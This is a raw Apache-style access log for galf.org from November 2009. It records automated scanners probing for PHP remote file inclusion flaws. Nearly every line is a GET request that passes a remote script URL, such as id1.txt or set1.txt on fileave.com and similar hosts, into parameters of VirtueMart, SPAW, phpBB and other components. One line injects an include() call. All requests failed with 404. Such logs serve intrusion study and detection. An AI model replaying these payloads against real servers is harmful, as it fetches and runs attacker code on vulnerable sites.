64.6.232.171 - - [08/Nov/2009:22:34:15 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
67.227.134.140 - - [08/Nov/2009:22:37:31 -0800] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.227.134.140 - - [08/Nov/2009:22:37:31 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.227.134.140 - - [08/Nov/2009:22:37:31 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.6.232.171 - - [08/Nov/2009:22:37:46 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
69.94.125.100 - - [08/Nov/2009:22:37:49 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/idalb.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.218.228.226 - - [08/Nov/2009:22:41:02 -0800] "GET /logs/access_090406.log//paginedinamiche/main.php?pagina=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [08/Nov/2009:22:41:27 -0800] "GET /logs/access_090706.log//paginedinamiche/main.php?pagina=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.94.125.100 - - [08/Nov/2009:22:43:41 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/idalb.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:22:44:14 -0800] "GET /logs/access_090810.log//faqsupport/samplefaqsupport.php?path[docroot]=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:22:44:14 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:22:44:14 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:22:44:20 -0800] "GET /logs/access_090803.log//faqsupport/samplefaqsupport.php?path[docroot]=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:45:54 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:45:54 -0800] "GET /logs/access_090810.log//faqsupport/samplefaqsupport.php?path[docroot]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:45:54 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:45:54 -0800] "GET /logs/access_090803.log//faqsupport/samplefaqsupport.php?path[docroot]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:45:55 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:45:55 -0800] "GET /logs/access_090810.log//faqsupport/samplefaqsupport.php?path[docroot]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:45:55 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:46:13 -0800] "GET /logs/access_090803.log//faqsupport/samplefaqsupport.php?path[docroot]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:46:39 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [08/Nov/2009:22:46:39 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [08/Nov/2009:22:46:39 -0800] "GET /logs/access.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [08/Nov/2009:22:46:39 -0800] "GET /logs/access.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [08/Nov/2009:22:46:39 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [08/Nov/2009:22:46:39 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [08/Nov/2009:22:46:41 -0800] "GET /logs/access.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [08/Nov/2009:22:46:41 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [08/Nov/2009:22:46:41 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [08/Nov/2009:22:47:02 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [08/Nov/2009:22:47:02 -0800] "GET /logs/access.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [08/Nov/2009:22:47:02 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [08/Nov/2009:22:47:03 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [08/Nov/2009:22:47:03 -0800] "GET /logs/access.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [08/Nov/2009:22:47:03 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [08/Nov/2009:22:47:05 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [08/Nov/2009:22:47:05 -0800] "GET /logs/access.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [08/Nov/2009:22:47:05 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [08/Nov/2009:22:47:12 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:47:12 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:47:12 -0800] "GET /logs/access_090406.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:22:47:49 -0800] "GET /logs/access_090803.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:22:47:49 -0800] "GET /logs/access_090720.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:02 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:02 -0800] "GET /logs/access.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:02 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:13 -0800] "GET /logs/access_090810.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:13 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:13 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:20 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:20 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:21 -0800] "GET /logs/access.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:22 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:22 -0800] "GET /logs/access_091012.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:22 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:22 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:22 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:22 -0800] "GET /logs/access.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:22 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:23 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.25.94.14 - - [08/Nov/2009:22:48:23 -0800] "GET /plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:22:48:23 -0800] "GET /logs/access_090615.log//plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:22:48:23 -0800] "GET /logs//plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:23 -0800] "GET /logs/access_091012.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:48:29 -0800] "GET /logs/access_090720.log//faqsupport/samplefaqsupport.php?path[docroot]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:31 -0800] "GET /logs/access_090810.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:33 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:33 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:33 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:33 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:34 -0800] "GET /logs/access_091012.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:34 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:34 -0800] "GET /logs/access_090810.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:34 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:48:43 -0800] "GET /logs/access_090803.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:48:43 -0800] "GET /logs/access_090720.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:22:48:44 -0800] "GET /logs/access_090601.log//plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:48:44 -0800] "GET /logs/access_090803.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:48:50 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:48:50 -0800] "GET /logs/access_091012.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:48:50 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:51 -0800] "GET /index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:52 -0800] "GET /logs//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:52 -0800] "GET /logs/access_091012.log%20%20//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:58 -0800] "GET /logs/access_091012.log%20%20//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:58 -0800] "GET /index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:48:58 -0800] "GET /logs//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [08/Nov/2009:22:49:00 -0800] "GET /skin/sirini_ezset/setup.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [08/Nov/2009:22:49:00 -0800] "GET /logs/access.log//skin/sirini_ezset/setup.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [08/Nov/2009:22:49:00 -0800] "GET /logs//skin/sirini_ezset/setup.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:49:01 -0800] "GET /logs/access_090720.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [08/Nov/2009:22:49:02 -0800] "GET /logs//skin/sirini_ezset/setup.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [08/Nov/2009:22:49:02 -0800] "GET /logs/access.log//skin/sirini_ezset/setup.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [08/Nov/2009:22:49:02 -0800] "GET /skin/sirini_ezset/setup.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:49:09 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:49:09 -0800] "GET /logs/access_091012.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:49:09 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:49:11 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:49:11 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:49:11 -0800] "GET /logs/access_091012.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:49:23 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [08/Nov/2009:22:49:23 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [08/Nov/2009:22:49:23 -0800] "GET /logs/access.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [08/Nov/2009:22:49:26 -0800] "GET /logs/access.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [08/Nov/2009:22:49:26 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [08/Nov/2009:22:49:26 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
201.218.228.226 - - [08/Nov/2009:22:49:26 -0800] "GET /logs/access_090914.log//paginedinamiche/main.php?pagina=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:49:30 -0800] "GET /logs/access.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [08/Nov/2009:22:49:30 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [08/Nov/2009:22:49:30 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [08/Nov/2009:22:49:31 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:49:31 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:49:31 -0800] "GET /logs/access_090810.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:49:34 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:49:34 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:49:34 -0800] "GET /logs/access_090810.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:49:37 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:49:37 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
